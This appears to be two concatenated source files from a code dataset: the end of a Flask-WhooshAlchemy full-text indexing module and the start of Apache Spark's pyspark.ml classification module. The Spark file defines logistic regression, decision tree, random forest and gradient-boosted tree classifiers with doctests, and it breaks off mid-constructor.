# gets the whoosh index for this model, creating one if it does not exist.
# A dict of model -> whoosh index is added to the ``app`` variable.
if not hasattr(app, 'whoosh_indexes'):
app.whoosh_indexes = {}
return app.whoosh_indexes.get(model.__name__,
_create_index(app, model))
def _create_index(app, model):
# a schema is created based on the fields of the model. Currently we only
# support primary key -> whoosh.ID, and sqlalchemy.(String, Unicode, Text)
# -> whoosh.TEXT.
if not app.config.get('WHOOSH_BASE'):
# XXX todo: is there a better approach to handle the absence of a
# config value for whoosh base? Should we throw an exception? If
# so, this exception will be thrown in the after_commit function,
# which is probably not ideal.
app.config['WHOOSH_BASE'] = DEFAULT_WHOOSH_INDEX_NAME
# we index per model.
wi = os.path.join(app.config.get('WHOOSH_BASE'),
model.__name__)
schema, primary_key = _get_whoosh_schema_and_primary_key(model)
if whoosh.index.exists_in(wi):
indx = whoosh.index.open_dir(wi)
else:
if not os.path.exists(wi):
os.makedirs(wi)
indx = whoosh.index.create_in(wi, schema)
app.whoosh_indexes[model.__name__] = indx
searcher = _Searcher(primary_key, indx)
model.query = _QueryProxy(model.query, primary_key,
searcher, model)
model.pure_whoosh = searcher
return indx
def _get_whoosh_schema_and_primary_key(model):
schema = {}
primary = None
searchable = set(model.__searchable__)
for field in model.__table__.columns:
if field.primary_key:
schema[field.name] = whoosh.fields.ID(stored=True, unique=True)
primary = field.name
if field.name in searchable and isinstance(field.type,
(sqlalchemy.types.Text, sqlalchemy.types.String,
sqlalchemy.types.Unicode)):
schema[field.name] = whoosh.fields.TEXT(
analyzer=StemmingAnalyzer())
return Schema(**schema), primary
def _after_flush(app, changes):
# Any db updates go through here. We check if any of these models have
# ``__searchable__`` fields, indicating they need to be indexed. With these
# we update the whoosh index for the model. If no index exists, it will be
# created here; this could impose a penalty on the initial commit of a
# model.
bytype = {} # sort changes by type so we can use per-model writer
for change in changes:
update = change[1] in ('update', 'insert')
if hasattr(change[0].__class__, __searchable__):
bytype.setdefault(change[0].__class__.__name__, []).append((update,
change[0]))
for model, values in bytype.iteritems():
index = whoosh_index(app, values[0][1].__class__)
with index.writer() as writer:
primary_field = values[0][1].pure_whoosh.primary_key_name
searchable = values[0][1].__searchable__
for update, v in values:
if update:
attrs = {}
for key in searchable:
try:
attrs[key] = unicode(getattr(v, key))
except AttributeError:
raise AttributeError('{0} does not have {1} field {2}'
.format(model, __searchable__, key))
attrs[primary_field] = unicode(getattr(v, primary_field))
writer.update_document(**attrs)
else:
writer.delete_by_term(primary_field, unicode(getattr(v,
primary_field)))
models_committed.connect(_after_flush)
# def init_app(db):
# app = db.get_app()
# # for table in db.get_tables_for_bind():
# for item in globals():
#
# #_create_index(app, table)
| gpl-2.0 | 4,833,850,226,278,433,000 | 32.246324 | 82 | 0.607652 | false |
ZxlAaron/mypros | python/pyspark/ml/classification.py | 10 | 64620 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import operator
from pyspark import since, keyword_only
from pyspark.ml import Estimator, Model
from pyspark.ml.param.shared import *
from pyspark.ml.regression import DecisionTreeModel, DecisionTreeRegressionModel, \
RandomForestParams, TreeEnsembleModel, TreeEnsembleParams
from pyspark.ml.util import *
from pyspark.ml.wrapper import JavaEstimator, JavaModel, JavaParams
from pyspark.ml.wrapper import JavaWrapper
from pyspark.ml.common import inherit_doc
from pyspark.sql import DataFrame
from pyspark.sql.functions import udf, when
from pyspark.sql.types import ArrayType, DoubleType
from pyspark.storagelevel import StorageLevel
__all__ = ['LogisticRegression', 'LogisticRegressionModel',
'LogisticRegressionSummary', 'LogisticRegressionTrainingSummary',
'BinaryLogisticRegressionSummary', 'BinaryLogisticRegressionTrainingSummary',
'DecisionTreeClassifier', 'DecisionTreeClassificationModel',
'GBTClassifier', 'GBTClassificationModel',
'RandomForestClassifier', 'RandomForestClassificationModel',
'NaiveBayes', 'NaiveBayesModel',
'MultilayerPerceptronClassifier', 'MultilayerPerceptronClassificationModel',
'OneVsRest', 'OneVsRestModel']
@inherit_doc
class JavaClassificationModel(JavaPredictionModel):
"""
(Private) Java Model produced by a ``Classifier``.
Classes are indexed {0, 1, ..., numClasses - 1}.
To be mixed in with class:`pyspark.ml.JavaModel`
"""
@property
@since("2.1.0")
def numClasses(self):
"""
Number of classes (values which the label can take).
"""
return self._call_java("numClasses")
@inherit_doc
class LogisticRegression(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol, HasMaxIter,
HasRegParam, HasTol, HasProbabilityCol, HasRawPredictionCol,
HasElasticNetParam, HasFitIntercept, HasStandardization, HasThresholds,
HasWeightCol, HasAggregationDepth, JavaMLWritable, JavaMLReadable):
"""
Logistic regression.
This class supports multinomial logistic (softmax) and binomial logistic regression.
>>> from pyspark.sql import Row
>>> from pyspark.ml.linalg import Vectors
>>> bdf = sc.parallelize([
... Row(label=1.0, weight=2.0, features=Vectors.dense(1.0)),
... Row(label=0.0, weight=2.0, features=Vectors.sparse(1, [], []))]).toDF()
>>> blor = LogisticRegression(maxIter=5, regParam=0.01, weightCol="weight")
>>> blorModel = blor.fit(bdf)
>>> blorModel.coefficients
DenseVector([5.5...])
>>> blorModel.intercept
-2.68...
>>> mdf = sc.parallelize([
... Row(label=1.0, weight=2.0, features=Vectors.dense(1.0)),
... Row(label=0.0, weight=2.0, features=Vectors.sparse(1, [], [])),
... Row(label=2.0, weight=2.0, features=Vectors.dense(3.0))]).toDF()
>>> mlor = LogisticRegression(maxIter=5, regParam=0.01, weightCol="weight",
... family="multinomial")
>>> mlorModel = mlor.fit(mdf)
>>> print(mlorModel.coefficientMatrix)
DenseMatrix([[-2.3...],
[ 0.2...],
[ 2.1... ]])
>>> mlorModel.interceptVector
DenseVector([2.0..., 0.8..., -2.8...])
>>> test0 = sc.parallelize([Row(features=Vectors.dense(-1.0))]).toDF()
>>> result = blorModel.transform(test0).head()
>>> result.prediction
0.0
>>> result.probability
DenseVector([0.99..., 0.00...])
>>> result.rawPrediction
DenseVector([8.22..., -8.22...])
>>> test1 = sc.parallelize([Row(features=Vectors.sparse(1, [0], [1.0]))]).toDF()
>>> blorModel.transform(test1).head().prediction
1.0
>>> blor.setParams("vector")
Traceback (most recent call last):
...
TypeError: Method setParams forces keyword arguments.
>>> lr_path = temp_path + "/lr"
>>> blor.save(lr_path)
>>> lr2 = LogisticRegression.load(lr_path)
>>> lr2.getMaxIter()
5
>>> model_path = temp_path + "/lr_model"
>>> blorModel.save(model_path)
>>> model2 = LogisticRegressionModel.load(model_path)
>>> blorModel.coefficients[0] == model2.coefficients[0]
True
>>> blorModel.intercept == model2.intercept
True
.. versionadded:: 1.3.0
"""
threshold = Param(Params._dummy(), "threshold",
"Threshold in binary classification prediction, in range [0, 1]." +
" If threshold and thresholds are both set, they must match." +
"e.g. if threshold is p, then thresholds must be equal to [1-p, p].",
typeConverter=TypeConverters.toFloat)
family = Param(Params._dummy(), "family",
"The name of family which is a description of the label distribution to " +
"be used in the model. Supported options: auto, binomial, multinomial",
typeConverter=TypeConverters.toString)
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxIter=100, regParam=0.0, elasticNetParam=0.0, tol=1e-6, fitIntercept=True,
threshold=0.5, thresholds=None, probabilityCol="probability",
rawPredictionCol="rawPrediction", standardization=True, weightCol=None,
aggregationDepth=2, family="auto"):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxIter=100, regParam=0.0, elasticNetParam=0.0, tol=1e-6, fitIntercept=True, \
threshold=0.5, thresholds=None, probabilityCol="probability", \
rawPredictionCol="rawPrediction", standardization=True, weightCol=None, \
aggregationDepth=2, family="auto")
If the threshold and thresholds Params are both set, they must be equivalent.
"""
super(LogisticRegression, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.LogisticRegression", self.uid)
self._setDefault(maxIter=100, regParam=0.0, tol=1E-6, threshold=0.5, family="auto")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
self._checkThresholdConsistency()
@keyword_only
@since("1.3.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxIter=100, regParam=0.0, elasticNetParam=0.0, tol=1e-6, fitIntercept=True,
threshold=0.5, thresholds=None, probabilityCol="probability",
rawPredictionCol="rawPrediction", standardization=True, weightCol=None,
aggregationDepth=2, family="auto"):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxIter=100, regParam=0.0, elasticNetParam=0.0, tol=1e-6, fitIntercept=True, \
threshold=0.5, thresholds=None, probabilityCol="probability", \
rawPredictionCol="rawPrediction", standardization=True, weightCol=None, \
aggregationDepth=2, family="auto")
Sets params for logistic regression.
If the threshold and thresholds Params are both set, they must be equivalent.
"""
kwargs = self.setParams._input_kwargs
self._set(**kwargs)
self._checkThresholdConsistency()
return self
def _create_model(self, java_model):
return LogisticRegressionModel(java_model)
@since("1.4.0")
def setThreshold(self, value):
"""
Sets the value of :py:attr:`threshold`.
Clears value of :py:attr:`thresholds` if it has been set.
"""
self._set(threshold=value)
self._clear(self.thresholds)
return self
@since("1.4.0")
def getThreshold(self):
"""
Get threshold for binary classification.
If :py:attr:`thresholds` is set with length 2 (i.e., binary classification),
this returns the equivalent threshold:
:math:`\\frac{1}{1 + \\frac{thresholds(0)}{thresholds(1)}}`.
Otherwise, returns :py:attr:`threshold` if set or its default value if unset.
"""
self._checkThresholdConsistency()
if self.isSet(self.thresholds):
ts = self.getOrDefault(self.thresholds)
if len(ts) != 2:
raise ValueError("Logistic Regression getThreshold only applies to" +
" binary classification, but thresholds has length != 2." +
" thresholds: " + ",".join(ts))
return 1.0/(1.0 + ts[0]/ts[1])
else:
return self.getOrDefault(self.threshold)
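# Worked example of the conversion above: thresholds=[0.25, 0.75] gives
# threshold = 1 / (1 + 0.25 / 0.75) = 0.75, so the two parameterizations
# stay consistent for binary problems.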
@since("1.5.0")
def setThresholds(self, value):
"""
Sets the value of :py:attr:`thresholds`.
Clears value of :py:attr:`threshold` if it has been set.
"""
self._set(thresholds=value)
self._clear(self.threshold)
return self
@since("1.5.0")
def getThresholds(self):
"""
If :py:attr:`thresholds` is set, return its value.
Otherwise, if :py:attr:`threshold` is set, return the equivalent thresholds for binary
classification: (1-threshold, threshold).
If neither are set, throw an error.
"""
self._checkThresholdConsistency()
if not self.isSet(self.thresholds) and self.isSet(self.threshold):
t = self.getOrDefault(self.threshold)
return [1.0-t, t]
else:
return self.getOrDefault(self.thresholds)
def _checkThresholdConsistency(self):
if self.isSet(self.threshold) and self.isSet(self.thresholds):
ts = self.getParam(self.thresholds)
if len(ts) != 2:
raise ValueError("Logistic Regression getThreshold only applies to" +
" binary classification, but thresholds has length != 2." +
" thresholds: " + ",".join(ts))
t = 1.0/(1.0 + ts[0]/ts[1])
t2 = self.getParam(self.threshold)
if abs(t2 - t) >= 1E-5:
raise ValueError("Logistic Regression getThreshold found inconsistent values for" +
" threshold (%g) and thresholds (equivalent to %g)" % (t2, t))
@since("2.1.0")
def setFamily(self, value):
"""
Sets the value of :py:attr:`family`.
"""
return self._set(family=value)
@since("2.1.0")
def getFamily(self):
"""
Gets the value of :py:attr:`family` or its default value.
"""
return self.getOrDefault(self.family)
class LogisticRegressionModel(JavaModel, JavaClassificationModel, JavaMLWritable, JavaMLReadable):
"""
Model fitted by LogisticRegression.
.. versionadded:: 1.3.0
"""
@property
@since("2.0.0")
def coefficients(self):
"""
Model coefficients of binomial logistic regression.
An exception is thrown in the case of multinomial logistic regression.
"""
return self._call_java("coefficients")
@property
@since("1.4.0")
def intercept(self):
"""
Model intercept of binomial logistic regression.
An exception is thrown in the case of multinomial logistic regression.
"""
return self._call_java("intercept")
@property
@since("2.1.0")
def coefficientMatrix(self):
"""
Model coefficients.
"""
return self._call_java("coefficientMatrix")
@property
@since("2.1.0")
def interceptVector(self):
"""
Model intercept.
"""
return self._call_java("interceptVector")
@property
@since("2.0.0")
def summary(self):
"""
Gets summary (e.g. accuracy/precision/recall, objective history, total iterations) of model
trained on the training set. An exception is thrown if `trainingSummary is None`.
"""
if self.hasSummary:
java_blrt_summary = self._call_java("summary")
# Note: Once multiclass is added, update this to return correct summary
return BinaryLogisticRegressionTrainingSummary(java_blrt_summary)
else:
raise RuntimeError("No training summary available for this %s" %
self.__class__.__name__)
@property
@since("2.0.0")
def hasSummary(self):
"""
Indicates whether a training summary exists for this model
instance.
"""
return self._call_java("hasSummary")
@since("2.0.0")
def evaluate(self, dataset):
"""
Evaluates the model on a test dataset.
:param dataset:
Test dataset to evaluate model on, where dataset is an
instance of :py:class:`pyspark.sql.DataFrame`
"""
if not isinstance(dataset, DataFrame):
raise ValueError("dataset must be a DataFrame but got %s." % type(dataset))
java_blr_summary = self._call_java("evaluate", dataset)
return BinaryLogisticRegressionSummary(java_blr_summary)
class LogisticRegressionSummary(JavaWrapper):
"""
.. note:: Experimental
Abstraction for Logistic Regression Results for a given model.
.. versionadded:: 2.0.0
"""
@property
@since("2.0.0")
def predictions(self):
"""
Dataframe outputted by the model's `transform` method.
"""
return self._call_java("predictions")
@property
@since("2.0.0")
def probabilityCol(self):
"""
Field in "predictions" which gives the probability
of each class as a vector.
"""
return self._call_java("probabilityCol")
@property
@since("2.0.0")
def labelCol(self):
"""
Field in "predictions" which gives the true label of each
instance.
"""
return self._call_java("labelCol")
@property
@since("2.0.0")
def featuresCol(self):
"""
Field in "predictions" which gives the features of each instance
as a vector.
"""
return self._call_java("featuresCol")
@inherit_doc
class LogisticRegressionTrainingSummary(LogisticRegressionSummary):
"""
.. note:: Experimental
Abstraction for multinomial Logistic Regression Training results.
Currently, the training summary ignores the training weights except
for the objective trace.
.. versionadded:: 2.0.0
"""
@property
@since("2.0.0")
def objectiveHistory(self):
"""
Objective function (scaled loss + regularization) at each
iteration.
"""
return self._call_java("objectiveHistory")
@property
@since("2.0.0")
def totalIterations(self):
"""
Number of training iterations until termination.
"""
return self._call_java("totalIterations")
@inherit_doc
class BinaryLogisticRegressionSummary(LogisticRegressionSummary):
"""
.. note:: Experimental
Binary Logistic regression results for a given model.
.. versionadded:: 2.0.0
"""
@property
@since("2.0.0")
def roc(self):
"""
Returns the receiver operating characteristic (ROC) curve,
which is a Dataframe having two fields (FPR, TPR) with
(0.0, 0.0) prepended and (1.0, 1.0) appended to it.
.. seealso:: `Wikipedia reference \
<http://en.wikipedia.org/wiki/Receiver_operating_characteristic>`_
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("roc")
@property
@since("2.0.0")
def areaUnderROC(self):
"""
Computes the area under the receiver operating characteristic
(ROC) curve.
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("areaUnderROC")
@property
@since("2.0.0")
def pr(self):
"""
Returns the precision-recall curve, which is a Dataframe
containing two fields recall, precision with (0.0, 1.0) prepended
to it.
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("pr")
@property
@since("2.0.0")
def fMeasureByThreshold(self):
"""
Returns a dataframe with two fields (threshold, F-Measure) curve
with beta = 1.0.
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("fMeasureByThreshold")
@property
@since("2.0.0")
def precisionByThreshold(self):
"""
Returns a dataframe with two fields (threshold, precision) curve.
Every possible probability obtained in transforming the dataset
are used as thresholds used in calculating the precision.
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("precisionByThreshold")
@property
@since("2.0.0")
def recallByThreshold(self):
"""
Returns a dataframe with two fields (threshold, recall) curve.
Every possible probability obtained in transforming the dataset
are used as thresholds used in calculating the recall.
.. note:: This ignores instance weights (setting all to 1.0) from
`LogisticRegression.weightCol`. This will change in later Spark
versions.
"""
return self._call_java("recallByThreshold")
@inherit_doc
class BinaryLogisticRegressionTrainingSummary(BinaryLogisticRegressionSummary,
LogisticRegressionTrainingSummary):
"""
.. note:: Experimental
Binary Logistic regression training results for a given model.
.. versionadded:: 2.0.0
"""
pass
class TreeClassifierParams(object):
"""
Private class to track supported impurity measures.
.. versionadded:: 1.4.0
"""
supportedImpurities = ["entropy", "gini"]
impurity = Param(Params._dummy(), "impurity",
"Criterion used for information gain calculation (case-insensitive). " +
"Supported options: " +
", ".join(supportedImpurities), typeConverter=TypeConverters.toString)
def __init__(self):
super(TreeClassifierParams, self).__init__()
@since("1.6.0")
def setImpurity(self, value):
"""
Sets the value of :py:attr:`impurity`.
"""
return self._set(impurity=value)
@since("1.6.0")
def getImpurity(self):
"""
Gets the value of impurity or its default value.
"""
return self.getOrDefault(self.impurity)
class GBTParams(TreeEnsembleParams):
"""
Private class to track supported GBT params.
.. versionadded:: 1.4.0
"""
supportedLossTypes = ["logistic"]
@inherit_doc
class DecisionTreeClassifier(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol,
HasProbabilityCol, HasRawPredictionCol, DecisionTreeParams,
TreeClassifierParams, HasCheckpointInterval, HasSeed, JavaMLWritable,
JavaMLReadable):
"""
`Decision tree <http://en.wikipedia.org/wiki/Decision_tree_learning>`_
learning algorithm for classification.
It supports both binary and multiclass labels, as well as both continuous and categorical
features.
>>> from pyspark.ml.linalg import Vectors
>>> from pyspark.ml.feature import StringIndexer
>>> df = spark.createDataFrame([
... (1.0, Vectors.dense(1.0)),
... (0.0, Vectors.sparse(1, [], []))], ["label", "features"])
>>> stringIndexer = StringIndexer(inputCol="label", outputCol="indexed")
>>> si_model = stringIndexer.fit(df)
>>> td = si_model.transform(df)
>>> dt = DecisionTreeClassifier(maxDepth=2, labelCol="indexed")
>>> model = dt.fit(td)
>>> model.numNodes
3
>>> model.depth
1
>>> model.featureImportances
SparseVector(1, {0: 1.0})
>>> model.numFeatures
1
>>> model.numClasses
2
>>> print(model.toDebugString)
DecisionTreeClassificationModel (uid=...) of depth 1 with 3 nodes...
>>> test0 = spark.createDataFrame([(Vectors.dense(-1.0),)], ["features"])
>>> result = model.transform(test0).head()
>>> result.prediction
0.0
>>> result.probability
DenseVector([1.0, 0.0])
>>> result.rawPrediction
DenseVector([1.0, 0.0])
>>> test1 = spark.createDataFrame([(Vectors.sparse(1, [0], [1.0]),)], ["features"])
>>> model.transform(test1).head().prediction
1.0
>>> dtc_path = temp_path + "/dtc"
>>> dt.save(dtc_path)
>>> dt2 = DecisionTreeClassifier.load(dtc_path)
>>> dt2.getMaxDepth()
2
>>> model_path = temp_path + "/dtc_model"
>>> model.save(model_path)
>>> model2 = DecisionTreeClassificationModel.load(model_path)
>>> model.featureImportances == model2.featureImportances
True
.. versionadded:: 1.4.0
"""
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, impurity="gini",
seed=None):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, impurity="gini", \
seed=None)
"""
super(DecisionTreeClassifier, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.DecisionTreeClassifier", self.uid)
self._setDefault(maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10,
impurity="gini")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
@since("1.4.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10,
impurity="gini", seed=None):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, impurity="gini", \
seed=None)
Sets params for the DecisionTreeClassifier.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return DecisionTreeClassificationModel(java_model)
@inherit_doc
class DecisionTreeClassificationModel(DecisionTreeModel, JavaClassificationModel, JavaMLWritable,
JavaMLReadable):
"""
Model fitted by DecisionTreeClassifier.
.. versionadded:: 1.4.0
"""
@property
@since("2.0.0")
def featureImportances(self):
"""
Estimate of the importance of each feature.
This generalizes the idea of "Gini" importance to other losses,
following the explanation of Gini importance from "Random Forests" documentation
by Leo Breiman and Adele Cutler, and following the implementation from scikit-learn.
This feature importance is calculated as follows:
- importance(feature j) = sum (over nodes which split on feature j) of the gain,
where gain is scaled by the number of instances passing through node
- Normalize importances for tree to sum to 1.
.. note:: Feature importance for single decision trees can have high variance due to
correlated predictor variables. Consider using a :py:class:`RandomForestClassifier`
to determine feature importance instead.
"""
return self._call_java("featureImportances")
@inherit_doc
class RandomForestClassifier(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol, HasSeed,
HasRawPredictionCol, HasProbabilityCol,
RandomForestParams, TreeClassifierParams, HasCheckpointInterval,
JavaMLWritable, JavaMLReadable):
"""
`Random Forest <http://en.wikipedia.org/wiki/Random_forest>`_
learning algorithm for classification.
It supports both binary and multiclass labels, as well as both continuous and categorical
features.
>>> import numpy
>>> from numpy import allclose
>>> from pyspark.ml.linalg import Vectors
>>> from pyspark.ml.feature import StringIndexer
>>> df = spark.createDataFrame([
... (1.0, Vectors.dense(1.0)),
... (0.0, Vectors.sparse(1, [], []))], ["label", "features"])
>>> stringIndexer = StringIndexer(inputCol="label", outputCol="indexed")
>>> si_model = stringIndexer.fit(df)
>>> td = si_model.transform(df)
>>> rf = RandomForestClassifier(numTrees=3, maxDepth=2, labelCol="indexed", seed=42)
>>> model = rf.fit(td)
>>> model.featureImportances
SparseVector(1, {0: 1.0})
>>> allclose(model.treeWeights, [1.0, 1.0, 1.0])
True
>>> test0 = spark.createDataFrame([(Vectors.dense(-1.0),)], ["features"])
>>> result = model.transform(test0).head()
>>> result.prediction
0.0
>>> numpy.argmax(result.probability)
0
>>> numpy.argmax(result.rawPrediction)
0
>>> test1 = spark.createDataFrame([(Vectors.sparse(1, [0], [1.0]),)], ["features"])
>>> model.transform(test1).head().prediction
1.0
>>> model.trees
[DecisionTreeClassificationModel (uid=...) of depth..., DecisionTreeClassificationModel...]
>>> rfc_path = temp_path + "/rfc"
>>> rf.save(rfc_path)
>>> rf2 = RandomForestClassifier.load(rfc_path)
>>> rf2.getNumTrees()
3
>>> model_path = temp_path + "/rfc_model"
>>> model.save(model_path)
>>> model2 = RandomForestClassificationModel.load(model_path)
>>> model.featureImportances == model2.featureImportances
True
.. versionadded:: 1.4.0
"""
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, impurity="gini",
numTrees=20, featureSubsetStrategy="auto", seed=None, subsamplingRate=1.0):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, impurity="gini", \
numTrees=20, featureSubsetStrategy="auto", seed=None, subsamplingRate=1.0)
"""
super(RandomForestClassifier, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.RandomForestClassifier", self.uid)
self._setDefault(maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10,
impurity="gini", numTrees=20, featureSubsetStrategy="auto",
subsamplingRate=1.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
@since("1.4.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, seed=None,
impurity="gini", numTrees=20, featureSubsetStrategy="auto", subsamplingRate=1.0):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, seed=None, \
impurity="gini", numTrees=20, featureSubsetStrategy="auto", subsamplingRate=1.0)
        Sets params for RandomForestClassifier.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return RandomForestClassificationModel(java_model)
class RandomForestClassificationModel(TreeEnsembleModel, JavaClassificationModel, JavaMLWritable,
JavaMLReadable):
"""
Model fitted by RandomForestClassifier.
.. versionadded:: 1.4.0
"""
@property
@since("2.0.0")
def featureImportances(self):
"""
Estimate of the importance of each feature.
        Each feature's importance is the average of its importance across all trees in the ensemble.
The importance vector is normalized to sum to 1. This method is suggested by Hastie et al.
(Hastie, Tibshirani, Friedman. "The Elements of Statistical Learning, 2nd Edition." 2001.)
and follows the implementation from scikit-learn.
.. seealso:: :py:attr:`DecisionTreeClassificationModel.featureImportances`
"""
return self._call_java("featureImportances")
@property
@since("2.0.0")
def trees(self):
"""Trees in this ensemble. Warning: These have null parent Estimators."""
return [DecisionTreeClassificationModel(m) for m in list(self._call_java("trees"))]
@inherit_doc
class GBTClassifier(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol, HasMaxIter,
GBTParams, HasCheckpointInterval, HasStepSize, HasSeed, JavaMLWritable,
JavaMLReadable):
"""
`Gradient-Boosted Trees (GBTs) <http://en.wikipedia.org/wiki/Gradient_boosting>`_
learning algorithm for classification.
It supports binary labels, as well as both continuous and categorical features.
The implementation is based upon: J.H. Friedman. "Stochastic Gradient Boosting." 1999.
Notes on Gradient Boosting vs. TreeBoost:
- This implementation is for Stochastic Gradient Boosting, not for TreeBoost.
- Both algorithms learn tree ensembles by minimizing loss functions.
- TreeBoost (Friedman, 1999) additionally modifies the outputs at tree leaf nodes
based on the loss function, whereas the original gradient boosting method does not.
- We expect to implement TreeBoost in the future:
`SPARK-4240 <https://issues.apache.org/jira/browse/SPARK-4240>`_
.. note:: Multiclass labels are not currently supported.
>>> from numpy import allclose
>>> from pyspark.ml.linalg import Vectors
>>> from pyspark.ml.feature import StringIndexer
>>> df = spark.createDataFrame([
... (1.0, Vectors.dense(1.0)),
... (0.0, Vectors.sparse(1, [], []))], ["label", "features"])
>>> stringIndexer = StringIndexer(inputCol="label", outputCol="indexed")
>>> si_model = stringIndexer.fit(df)
>>> td = si_model.transform(df)
>>> gbt = GBTClassifier(maxIter=5, maxDepth=2, labelCol="indexed", seed=42)
>>> model = gbt.fit(td)
>>> model.featureImportances
SparseVector(1, {0: 1.0})
>>> allclose(model.treeWeights, [1.0, 0.1, 0.1, 0.1, 0.1])
True
>>> test0 = spark.createDataFrame([(Vectors.dense(-1.0),)], ["features"])
>>> model.transform(test0).head().prediction
0.0
>>> test1 = spark.createDataFrame([(Vectors.sparse(1, [0], [1.0]),)], ["features"])
>>> model.transform(test1).head().prediction
1.0
>>> model.totalNumNodes
15
>>> print(model.toDebugString)
GBTClassificationModel (uid=...)...with 5 trees...
>>> gbtc_path = temp_path + "gbtc"
>>> gbt.save(gbtc_path)
>>> gbt2 = GBTClassifier.load(gbtc_path)
>>> gbt2.getMaxDepth()
2
>>> model_path = temp_path + "gbtc_model"
>>> model.save(model_path)
>>> model2 = GBTClassificationModel.load(model_path)
>>> model.featureImportances == model2.featureImportances
True
>>> model.treeWeights == model2.treeWeights
True
>>> model.trees
[DecisionTreeRegressionModel (uid=...) of depth..., DecisionTreeRegressionModel...]
.. versionadded:: 1.4.0
"""
lossType = Param(Params._dummy(), "lossType",
"Loss function which GBT tries to minimize (case-insensitive). " +
"Supported options: " + ", ".join(GBTParams.supportedLossTypes),
typeConverter=TypeConverters.toString)
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, lossType="logistic",
maxIter=20, stepSize=0.1, seed=None, subsamplingRate=1.0):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, \
lossType="logistic", maxIter=20, stepSize=0.1, seed=None, subsamplingRate=1.0)
"""
super(GBTClassifier, self).__init__()
self._java_obj = self._new_java_obj(
